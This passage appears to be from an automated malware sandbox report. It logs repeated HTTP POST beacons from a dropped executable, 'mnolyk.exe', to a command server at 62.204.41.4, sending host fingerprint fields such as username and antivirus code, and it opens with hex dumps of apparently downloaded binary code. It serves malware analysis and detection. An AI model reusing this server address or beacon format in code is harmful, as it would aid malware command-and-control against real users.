                            Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                            Feb 8, 2023 17:37:24.817351103 CET104INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                            Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                            Feb 8, 2023 17:37:24.817387104 CET106INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                            Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                            Feb 8, 2023 17:37:24.817421913 CET107INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                            Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                            Feb 8, 2023 17:37:24.879908085 CET109INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                            Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            10192.168.2.44970562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:26.868385077 CET199OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:26.931653023 CET199INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:26 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            100192.168.2.44979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:51.324908972 CET288OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:51.388962984 CET289INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:51 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            101192.168.2.44979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:52.334939957 CET289OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.402563095 CET290INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            102192.168.2.44979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:52.616336107 CET290OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.681121111 CET291INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            103192.168.2.44979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:52.895060062 CET291OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:52.960750103 CET292INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:52 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            104192.168.2.44979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:53.714298010 CET292OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:53.781994104 CET293INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:53 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            105192.168.2.44980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:54.558247089 CET293OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:54.624588966 CET294INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            106192.168.2.44980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:54.834263086 CET294OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:54.899101019 CET295INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:54 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            107192.168.2.44980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:55.075474024 CET295OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.142520905 CET296INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            108192.168.2.44980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:55.306674004 CET296OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.370026112 CET297INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            109192.168.2.44980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:55.542967081 CET297OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.606290102 CET298INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            11192.168.2.44970662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:27.103523970 CET200OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.168011904 CET200INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            110192.168.2.44980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:55.775944948 CET298OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:55.838260889 CET299INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            111192.168.2.44980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:56.011816025 CET299OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.078195095 CET300INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            112192.168.2.44980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:56.250216961 CET300OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.316826105 CET301INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            113192.168.2.44980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:56.496601105 CET301OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.561832905 CET302INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            114192.168.2.44980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:56.735327959 CET302OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:56.799499035 CET303INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            115192.168.2.44981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:56.966033936 CET303OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.030962944 CET304INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            116192.168.2.44981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:57.197654963 CET304OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.262764931 CET305INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            117192.168.2.44981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:57.432480097 CET305OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
